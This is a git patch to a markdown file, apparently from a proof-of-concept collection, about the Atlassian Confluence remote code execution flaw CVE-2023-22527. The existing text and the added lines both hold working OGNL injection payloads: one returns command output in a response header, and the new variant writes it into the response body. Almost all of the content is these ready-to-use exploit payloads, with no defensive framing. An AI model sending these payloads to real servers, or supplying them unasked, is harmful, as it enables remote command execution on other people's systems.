From 9b588bd9bd254fddaf18fce9750288a56b5afb3a Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 25 Jan 2024 15:23:02 +0800
Subject: [PATCH] =?UTF-8?q?Update=20Atlassian=20Confluence=20=E8=BF=9C?=
 =?UTF-8?q?=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?(CVE-2023-22527).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527).md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527).md b/Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527).md
index 4a913e4..9c78561 100644
--- a/Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527).md	
+++ b/Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527).md	
@@ -32,6 +32,12 @@ Content-Type: application/x-www-form-urlencoded
 Content-Length: 285
 
 label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
+```
+
+回显在body exp
+```
+label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter.write((new+freemarker.template.utility.Execute()).exec({"id"}))
+
 ```
 ![image](https://github.com/wy876/POC/assets/139549762/60ed0618-c378-49c4-bbdc-c7c8067cb461)